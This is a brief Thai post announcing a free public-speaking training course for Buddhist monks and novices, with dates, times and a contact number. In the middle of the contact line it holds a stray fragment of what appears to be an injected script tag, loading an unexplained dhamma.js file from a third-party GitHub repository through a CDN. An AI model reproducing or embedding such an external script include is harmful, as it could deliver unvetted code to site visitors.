รับสมัครพระภิกษุสามเณรเพื่อการฝึกพูดในที่ชุมนุมชน(ฟรี)

 phanat    18 ก.พ. 2555

สมาคมฝึกการพูดแห่งประเทศไทยจัดโครงการถวายความรู้ศิลปะการพูดในที่ชุมนุมชน รุ่นที่ 11 ในวันอาทิตย์ที่ 4, 11, 18, 25 มีนาคมเวลา 13.00-18.00น. และวันที่ 1 เมษายน เวลา 9.00-17.00 น. พระผู้เข้ารับการฝึกอบรมไม่ต้องเสียค่าใช้จ่ายใดๆ สนใจติดต่อด่วนที่ 0865231599 https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   


ที่มา : สมาคมฝึกการพูดแห่งประเทศไทย


  3,564 

  แสดงความคิดเห็น


RELATED STORIESจีรัง กรุ๊ป    

 ธรรมะไทย